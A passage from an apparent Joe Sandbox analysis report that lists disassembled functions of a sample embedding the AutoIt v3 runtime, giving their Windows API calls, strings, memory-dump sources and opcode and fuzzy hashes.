Instruction Fuzzy Hash: 9BF0E23552622DBBDB60AFA4DC48FEA736CBF08361F0081A6FC1AD6180C6309910CBA1

Function 002A81CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002A8309), ref: 002A81E0
CloseHandle.KERNEL32(?,?,002A8309), ref: 002A81F2

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: bdba615e56c7b45316b7a1434ad86dbc76d78506c693992ed4ee4e68d06087c5
Instruction ID: 454b57e4f94632c6f68ffbf89c43cef62e4fb9c57fcd5de3b76bb9e13c2e1eff
Opcode Fuzzy Hash: bdba615e56c7b45316b7a1434ad86dbc76d78506c693992ed4ee4e68d06087c5
Instruction Fuzzy Hash: FBE04632021A10EFE7612B20FC08D737BEAEB04310714C82AB8AA80430CB72ACA0DB10

Function 0027A155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00278D57,?,?,?,00000001), ref: 0027A15A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0027A163

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 632a21d1779542346ac6fef68a0c88734ba6e5b3ac3630f622a34311d953dc12
Instruction ID: 9ff05b1e8d1e85512cb73e41824b74a20cfe9277360aed6246e3edda3dc73465
Opcode Fuzzy Hash: 632a21d1779542346ac6fef68a0c88734ba6e5b3ac3630f622a34311d953dc12
Instruction Fuzzy Hash: 99B09231455248ABCAC02B95FD0DB883F68EB44AA2F4180A2FE0E84060CB6258508A99

Function 0027F1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa5986d9bdd44b58e5de6d31e182df707e97d2fa45c508003d4ba0cf8e1f78dc
Instruction ID: 49591ba1d1aca478905cdf12969bebd3b0280bf53db71bcffd088dd4a5914a89
Opcode Fuzzy Hash: fa5986d9bdd44b58e5de6d31e182df707e97d2fa45c508003d4ba0cf8e1f78dc
Instruction Fuzzy Hash: A2320222D79F814DD7639A34E976335A248AFB73C8F15D73BE819B99A5EB38C4834100

Function 0028242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4eb1a77e857704eb8317ded26f6d4ef54ff8e0ff63962f43b603ad1f6456298e
Instruction ID: 93b466610b429f2c91811c75410da191dde12aa291ea9c5dbb994176c1c73cac
Opcode Fuzzy Hash: 4eb1a77e857704eb8317ded26f6d4ef54ff8e0ff63962f43b603ad1f6456298e
Instruction Fuzzy Hash: 23B11F20D6AF804DD323A6399875336B74CAFBB2C5F52D71BFC2678D62EB2190834241

Function 002B4C27 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 002B4C4A

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 82edb523e1bfcb2d3479e584ed534804251ae08ebe12d508db2f176831548789
Instruction ID: 6a1786fba65a6d0768f06120a555dca5d82cca83ddbef98e6919d5d2a3c8eed4
Opcode Fuzzy Hash: 82edb523e1bfcb2d3479e584ed534804251ae08ebe12d508db2f176831548789
Instruction Fuzzy Hash: 53D05E9117620A38EC5C2F20AE8FFFA0A08E300FCAFD8C18B76028A0C3ECE05C605035

Function 002A87B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,002A8389), ref: 002A87D1

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: c3154eb5025181ffd8357e6ed18d04d79eb7b2920d6f94ebe49b0d21b7ae637e
Instruction ID: 28aae296ab75f9c3c1be57ebc8185d81a69417abbcb9d3fd3790941d82762fc5
Opcode Fuzzy Hash: c3154eb5025181ffd8357e6ed18d04d79eb7b2920d6f94ebe49b0d21b7ae637e
Instruction Fuzzy Hash: 3DD05E3226050EABEF018EA4ED05EAE3B69EB04B01F408111FE16C61A1C775D935AB60

Function 0027A124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 0027A12A

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 666793bc01bc300e0e8f2d42c25d927b36fc6c44582d057f1d7725a3a860d072
Instruction ID: 4ef6534a693a9a4c3f29c7bfdc7719f7bacd8f4e3908aa18c591c863a901c23a
Opcode Fuzzy Hash: 666793bc01bc300e0e8f2d42c25d927b36fc6c44582d057f1d7725a3a860d072
Instruction Fuzzy Hash: 80A0123000010CA7CA401B45FC084447F5CD6001907004061FC0D40021873258104584

Function 00268808 Relevance: .6, Instructions: 590COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1475f8607be95c8b4752c0dc956db7c7df3fd7eb81f3565a2561ab6f2c4eecf
Instruction ID: 338b124f629cdba813d0c4ce77739b905736068d992a28dffeec8ddb2051ceeb
Opcode Fuzzy Hash: c1475f8607be95c8b4752c0dc956db7c7df3fd7eb81f3565a2561ab6f2c4eecf
Instruction Fuzzy Hash: 33223530534567CBDF288EA4C49477EB7A1FB42304F28826BD9469B692DFB09DF1CA41

Function 002721C5 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 3953bc27570286a5226d7f51e1d3d90014c2e9e783b1de3cfd394cf03e9ca52a
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: 89C1AA322250934ADF2D4A3D843503EFBA15EA27B131A875DD8BBDB1D5EE30C979D610

Function 002725FA Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 9211b47971c1bc0aca4c131b2eab3ce53786d22d5ed962d233e26a76a9cc1515
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: E5C1A73222519349DF2D4A3EC43503EFAA15EA27B131A876DD4BBDB1D4EE30C938D620

Function 00271978 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 744f060b5d4ed3caeed3cda1088847e79e1d5d6c952c6fa20cdb6c088123507c
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 49C1853222519309DF2D4A3DC47613EBAA15EA2BB131A975DD4BBDB1C4EE30C935DA10

Function 0147EFE8 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2057399383.000000000147B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0147B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_147b000_BgroUcYHpy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: 6ad8188d42d1db3952cb18f48940c0dd57c7d37fb33663d5d23cf1703801f493
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: A441D571D1051CDBCF48CFADC991AEEBBF1AF88201F548299D516AB345D730AB41DB80

Function 0147EED8 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2057399383.000000000147B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0147B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_147b000_BgroUcYHpy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction ID: 59df41b81dca0cba38e518f2ba9d9983bd00445df9103e05b9844ff31714c85c
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: 15019D78A11209EFCB44DF98C5909AEF7B5FF48310F2086DAE809A7715D730AE42DB80

Function 0147EE78 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2057399383.000000000147B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0147B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_147b000_BgroUcYHpy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction ID: 4f1963ca0cbb4368e9752f65a3857eab01816cbae8dd462c69a88c1402701374
Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: 54019278A00109EFCB54DF98C5909AEF7B6FF48310F208ADAD819A7351D730AE41DB80

Function 0147D818 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2057399383.000000000147B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0147B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_147b000_BgroUcYHpy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Function 002C7806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 002C785B
DeleteObject.GDI32(00000000), ref: 002C786D
DestroyWindow.USER32 ref: 002C787B
GetDesktopWindow.USER32 ref: 002C7895
GetWindowRect.USER32(00000000), ref: 002C789C
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 002C79DD
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 002C79ED
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002C7A35
GetClientRect.USER32(00000000,?), ref: 002C7A41
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 002C7A7B
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002C7A9D
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002C7AB0
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002C7ABB
GlobalLock.KERNEL32(00000000), ref: 002C7AC4
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002C7AD3
GlobalUnlock.KERNEL32(00000000), ref: 002C7ADC
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002C7AE3
GlobalFree.KERNEL32(00000000), ref: 002C7AEE
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002C7B00
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,002E2CAC,00000000), ref: 002C7B16
GlobalFree.KERNEL32(00000000), ref: 002C7B26
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 002C7B4C
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 002C7B6B
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002C7B8D
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002C7D7A

Strings

AutoIt v3, xrefs: 002C7A2D
DISPLAY, xrefs: 002C7BDD
, xrefs: 002C7D00
static, xrefs: 002C7A75, 002C7BCC

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 9f429adfa10ac2e0acf17348a94245a5867909361c8b905ff68269850126e490
Instruction ID: ed5e6ab468072b0857f21ef96420ffa6e8aa5b57a73784b29f0f3dd057110ce2
Opcode Fuzzy Hash: 9f429adfa10ac2e0acf17348a94245a5867909361c8b905ff68269850126e490
Instruction Fuzzy Hash: EA028A71920115EFDB14DFA4DD89EAE7BB9EF48310F148259F916AB2A0CB30AD11CF64

Function 002D356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,002DF910), ref: 002D3627
IsWindowVisible.USER32(?), ref: 002D364B

Strings

ISVISIBLE, xrefs: 002D3637
GETCURRENTLINE, xrefs: 002D38ED
GETLINECOUNT, xrefs: 002D38C6
GETSELECTED, xrefs: 002D38A3
SHOWDROPDOWN, xrefs: 002D36E0
CHECK, xrefs: 002D386D
SELECTSTRING, xrefs: 002D3806
UNCHECK, xrefs: 002D3883
GETCURRENTCOL, xrefs: 002D3928
GETLINE, xrefs: 002D399B
EDITPASTE, xrefs: 002D395F
SETCURRENTSELECTION, xrefs: 002D37B6
HIDEDROPDOWN, xrefs: 002D3700
DELSTRING, xrefs: 002D3749
ADDSTRING, xrefs: 002D3716
CURRENTTAB, xrefs: 002D36BD
GETCURRENTSELECTION, xrefs: 002D37E3
TABRIGHT, xrefs: 002D369D
FINDSTRING, xrefs: 002D3776
TABLEFT, xrefs: 002D3687
ISENABLED, xrefs: 002D366B
SENDCOMMANDID, xrefs: 002D39DA
ISCHECKED, xrefs: 002D3839

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: 1e1c88620b8ee313c0e8b9c452ad6b2e5bf153951b3babc1fb25fd075eb9918d
Instruction ID: 67805ccb1d6c6de3697fc92158d419e6b133559b42a7f68062d8b833a6d6f9aa
Opcode Fuzzy Hash: 1e1c88620b8ee313c0e8b9c452ad6b2e5bf153951b3babc1fb25fd075eb9918d
Instruction Fuzzy Hash: AAD19F30234301DBCB04EF10C466A6E77A5AF55754F14845AF8865B3E2CB71DE6ACF46

Function 002DA5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 002DA630
GetSysColorBrush.USER32(0000000F), ref: 002DA661
GetSysColor.USER32(0000000F), ref: 002DA66D
SetBkColor.GDI32(?,000000FF), ref: 002DA687
SelectObject.GDI32(?,00000000), ref: 002DA696
InflateRect.USER32(?,000000FF,000000FF), ref: 002DA6C1
GetSysColor.USER32(00000010), ref: 002DA6C9
CreateSolidBrush.GDI32(00000000), ref: 002DA6D0
FrameRect.USER32(?,?,00000000), ref: 002DA6DF
DeleteObject.GDI32(00000000), ref: 002DA6E6
InflateRect.USER32(?,000000FE,000000FE), ref: 002DA731
FillRect.USER32(?,?,00000000), ref: 002DA763
GetWindowLongW.USER32(?,000000F0), ref: 002DA78E

Part of subcall function 002DA8CA: GetSysColor.USER32(00000012), ref: 002DA903
Part of subcall function 002DA8CA: SetTextColor.GDI32(?,?), ref: 002DA907
Part of subcall function 002DA8CA: GetSysColorBrush.USER32(0000000F), ref: 002DA91D
Part of subcall function 002DA8CA: GetSysColor.USER32(0000000F), ref: 002DA928
Part of subcall function 002DA8CA: GetSysColor.USER32(00000011), ref: 002DA945
Part of subcall function 002DA8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 002DA953
Part of subcall function 002DA8CA: SelectObject.GDI32(?,00000000), ref: 002DA964
Part of subcall function 002DA8CA: SetBkColor.GDI32(?,00000000), ref: 002DA96D
Part of subcall function 002DA8CA: SelectObject.GDI32(?,?), ref: 002DA97A
Part of subcall function 002DA8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 002DA999
Part of subcall function 002DA8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 002DA9B0
Part of subcall function 002DA8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 002DA9C5
Part of subcall function 002DA8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 002DA9ED

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: b531890b108fab5495296d261dec14015427e70fde1ca53be2050c076b1517fb
Instruction ID: 61face4d5d7ce4121d35d366bd72d65739a60ac5defc2cf0b87f593646640684
Opcode Fuzzy Hash: b531890b108fab5495296d261dec14015427e70fde1ca53be2050c076b1517fb
Instruction Fuzzy Hash: 5F91AE72809301EFD7509F64ED0CE5BBBA9FB88321F144A2AF9A2961A0D770DD44CB56

Function 00252C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 00252CA2
DeleteObject.GDI32(00000000), ref: 00252CE8
DeleteObject.GDI32(00000000), ref: 00252CF3
DestroyIcon.USER32(00000000,?,?,?), ref: 00252CFE
DestroyWindow.USER32(00000000,?,?,?), ref: 00252D09
SendMessageW.USER32(?,00001308,?,00000000), ref: 0028C43B
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0028C474
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0028C89D

Part of subcall function 00251B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00252036,?,00000000,?,?,?,?,002516CB,00000000,?), ref: 00251B9A

SendMessageW.USER32(?,00001053), ref: 0028C8DA
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0028C8F1
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0028C907
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0028C912

Strings

0, xrefs: 0028C731

Memory Dump Source

